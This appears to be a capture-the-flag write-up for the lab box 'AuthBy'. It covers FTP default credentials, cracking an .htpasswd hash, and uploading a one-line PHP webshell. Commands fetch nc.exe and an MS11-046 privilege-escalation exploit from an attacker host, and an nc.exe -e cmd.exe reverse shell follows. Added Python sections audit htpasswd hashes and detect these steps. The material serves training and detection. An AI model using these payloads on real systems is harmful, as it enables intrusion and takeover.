# AuthBy

## Information Gathering

`sudo ./nmapAutomator.sh 192.168.216.46 all`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FshqOeYlfWG9KmIpwwvMq%2Fimage.png?alt=media\&token=562a645c-79b6-4066-9b9c-1ebd44f055f9)

### Service Enumeration

#### FTP (Port 21)

We see that there are a few accounts: Offsec, anonymous, and admin.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FQqVi3KPSnp7RHAYt43cY%2Fimage.png?alt=media\&token=8e7e43f6-4bf2-4d9b-8ffc-b0de1d4602e5)

Looks like `admin:admin` gives us access to some files.

We can download any file we have access to using:

`wget -m ftp://admin:admin@192.168.216.46`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FZmxNWJNyX2z6J2nj3yyJ%2Fimage.png?alt=media\&token=4e745c16-b820-4d33-be64-5e01ba824bc4)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FLkoGiKKDCT1kfkS5R2VY%2Fimage.png?alt=media\&token=d8f48093-7630-44dd-8558-7be1938dbfb2)

Looks like `.htpasswd` contains a password hash for the `offsec` user account.

We use john here to crack it.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FPGBZL6aflhgoZFXtI6CM%2Fimage.png?alt=media\&token=5a7f3cae-418c-4f9e-b8ae-9c5963ee2df1)

From here, we get `offsec:elite` for the HTTP server on port 242.
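The `.htpasswd` entry cracked because Apache's older hash formats are fast, unsalted or weakly salted hashes that john works through quickly. As an added defensive check (not part of this writeup, and not the box's actual file), the Python script below audits `.htpasswd` contents and flags every entry that is not bcrypt with an adequate cost. The sample file contents are constructed, and the `$apr1$` format for the `offsec` entry is an assumption: the writeup shows only that the hash cracked, not which algorithm it used.

```python
import re

# Constructed sample .htpasswd contents (not the file recovered from the box):
# one entry per format Apache's htpasswd(1) can produce, plus a plaintext line.
SAMPLE_HTPASSWD = """\
offsec:$apr1$abc12345$0123456789abcdefghijkl
legacy:AbCdEfGhIjKlM
sha1user:{SHA}qUqP5cyxm6YcTAhz05Hph5gvu9M=
modern:$2y$10$abcdefghijklmnopqrstuvABCDEFGHIJKLMNOPQRSTUVWXYZ01234
plain:hunter2
"""

# Hash-format prefixes and a verdict for each. Only bcrypt is a deliberately
# slow, salted password hash; apr1-md5, unsalted SHA1 and crypt(3) DES are all
# fast enough that an offline cracker gets through a wordlist in seconds.
# Order matters: the 13-character DES pattern is checked last because a
# 13-character plaintext password is indistinguishable from a DES hash here.
_FORMATS = [
    (re.compile(r"^\$2[aby]\$(\d{2})\$"), "bcrypt", "ok"),
    (re.compile(r"^\$apr1\$"), "apr1-md5", "weak"),
    (re.compile(r"^\{SHA\}"), "sha1-unsalted", "weak"),
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "crypt-des", "weak"),
]

MIN_BCRYPT_COST = 10  # cost below this is treated as a finding


def classify_hash(h):
    """Return (algorithm, verdict) for one htpasswd hash field."""
    for pattern, name, verdict in _FORMATS:
        m = pattern.match(h)
        if m:
            if name == "bcrypt" and int(m.group(1)) < MIN_BCRYPT_COST:
                return name, "weak-cost"
            return name, verdict
    # Anything else is either stored in clear or in a format we do not know.
    return "plaintext-or-unknown", "weak"


def audit_htpasswd(text):
    """Parse htpasswd contents and return one finding dict per entry."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if ":" not in line:
            findings.append({"line": lineno, "user": None,
                             "algorithm": "malformed", "verdict": "weak"})
            continue
        user, h = line.split(":", 1)
        alg, verdict = classify_hash(h)
        findings.append({"line": lineno, "user": user,
                         "algorithm": alg, "verdict": verdict})
    return findings


def weak_users(text):
    """Usernames whose stored hash should be rehashed with bcrypt."""
    return [f["user"] for f in audit_htpasswd(text) if f["verdict"] != "ok"]


if __name__ == "__main__":
    for finding in audit_htpasswd(SAMPLE_HTPASSWD):
        print(finding)
```

Run it against a real file with `audit_htpasswd(open("/path/to/.htpasswd").read())`. Rehashing flagged users with `htpasswd -B` (bcrypt) fixes the hash format, but it does not help if the file itself is readable over anonymous or `admin:admin` FTP as it was here; the file should never sit in a directory a weakly authenticated service can read.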

#### HTTP (Port 242)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FiUDrEY3O1WNuCQwpEAjL%2Fimage.png?alt=media\&token=89eec85f-e9ac-484b-b222-4cb593dfbe89)

## Exploit

We can transfer our `shell.php`, which contains the following:

{% code title="shell.php" %}

```php
<?php system($_GET['cmd']);?>
```

{% endcode %}

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FJoTBtTXrSv3hfl6T4L6D%2Fimage.png?alt=media\&token=c2748bf0-04f5-40f1-9f8d-e91ebd80366f)

Using the webshell, we then transfer `nc.exe` to the target machine.

`http://192.168.216.46:242/shell.php?cmd=certutil%20-urlcache%20-split%20-f%20http://192.168.49.216/home/kali/pg/authby/payloads/nc.exe%20nc.exe`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FolOCLfCJ5iY70z4FQepr%2Fimage.png?alt=media\&token=020be7e2-974b-4037-be7d-394a51bd321a)

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2F3BekcKBbRp2lktA2u71m%2Fimage.png?alt=media\&token=9bc4ea92-0fab-4a6a-a41b-ee380c7eabfc)

Now that we have `nc.exe` on the target machine, we can get our reverse shell.

`nc.exe -e cmd.exe 192.168.49.216 80`

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FyOqTKpHxwFV2REVJKKVJ%2Fimage.png?alt=media\&token=9b41a445-7a22-466b-8ab3-227db1efb4d8)

## Privesc

We can transfer winPEAS to the target machine and run it.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FI1mehIA27GSFWd6WaT4q%2Fimage.png?alt=media\&token=5ada4171-1e05-4886-893a-803b4e759187)

{% embed url="https://www.exploit-db.com/exploits/40564" %}

{% embed url="https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS11-046" %}

We can transfer the exploit to the target machine using the following command:

`cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/home/kali/pg/authby/windows-kernel-exploits/MS11-046/ms11-046.exe ms11-046.exe`

We run the executable, and we get SYSTEM.

![](https://1575243701-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-Mg-SvuygW2bF4zu7kiy%2Fuploads%2FExXXBuXDZInW5uSr9twG%2Fimage.png?alt=media\&token=e5fa40b7-e716-4ede-9e02-2092689116d8)
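Every stage of this chain after the initial webshell leaves a process-creation trail: the web server spawning `cmd.exe` (from `system()` in `shell.php`), `certutil -urlcache -split -f <url>` pulling `nc.exe` and later `ms11-046.exe`, and `nc.exe -e cmd.exe` dialling out. As an added detection example (not part of this writeup), the Python below runs three rules over constructed process-creation events. The pipe-separated event layout, the hostname `WEB01`, and the file paths are assumptions made for the sample; the command lines mirror the ones shown above.

```python
import ntpath

# Constructed process-creation events (not telemetry from the box), in a
# simplified shape: timestamp|host|parent_image|image|command_line
SAMPLE_EVENTS = r"""
2024-05-01T10:00:01Z|WEB01|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe notes.txt
2024-05-01T10:00:05Z|WEB01|C:\xampp\apache\bin\httpd.exe|C:\Windows\System32\cmd.exe|cmd.exe /c certutil -urlcache -split -f http://192.168.49.216/nc.exe nc.exe
2024-05-01T10:00:06Z|WEB01|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil -urlcache -split -f http://192.168.49.216/nc.exe nc.exe
2024-05-01T10:00:09Z|WEB01|C:\Windows\System32\services.exe|C:\Windows\System32\certutil.exe|certutil -verify -urlfetch C:\certs\server.cer
2024-05-01T10:00:30Z|WEB01|C:\Windows\System32\cmd.exe|C:\web\nc.exe|nc.exe -e cmd.exe 192.168.49.216 80
"""

WEB_SERVERS = {"httpd.exe", "w3wp.exe", "php-cgi.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
NETCATS = {"nc.exe", "nc64.exe", "ncat.exe"}


def parse_event(line):
    """Split one sample line into a dict; image names are lower-cased basenames."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host,
            "parent": ntpath.basename(parent).lower(),
            "image": ntpath.basename(image).lower(),
            "cmdline": cmdline}


def rule_certutil_download(ev):
    """certutil fetching from a URL (-urlcache with a scheme) is a download, not PKI work."""
    c = ev["cmdline"].lower()
    return ev["image"] == "certutil.exe" and "urlcache" in c and "://" in c


def rule_netcat_shell(ev):
    """A netcat binary given -e <shell> is binding a shell to a socket."""
    if ev["image"] not in NETCATS:
        return False
    tokens = ev["cmdline"].lower().split()
    return any(t == "-e" and i + 1 < len(tokens) and tokens[i + 1] in SHELLS
               for i, t in enumerate(tokens))


def rule_webserver_spawned_shell(ev):
    """A web server process should not be the parent of cmd.exe or PowerShell."""
    return ev["parent"] in WEB_SERVERS and ev["image"] in SHELLS


RULES = [
    ("certutil_url_download", rule_certutil_download),
    ("netcat_reverse_shell", rule_netcat_shell),
    ("webserver_spawned_shell", rule_webserver_spawned_shell),
]


def detect(text):
    """Return (timestamp, host, rule, command_line) for every matching event."""
    hits = []
    for raw in text.splitlines():
        if not raw.strip():
            continue
        ev = parse_event(raw)
        for name, rule in RULES:
            if rule(ev):
                hits.append((ev["ts"], ev["host"], name, ev["cmdline"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The `-urlfetch` event from `services.exe` is there as a negative case: `certutil -verify -urlfetch` is routine certificate-chain checking and must not fire the downloader rule, which is why the rule keys on `urlcache` plus a URL scheme rather than on the word `url`. On a real host these fields map onto Sysmon Event ID 1 (`ParentImage`, `Image`, `CommandLine`) or Windows Security event 4688 with command-line auditing enabled.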
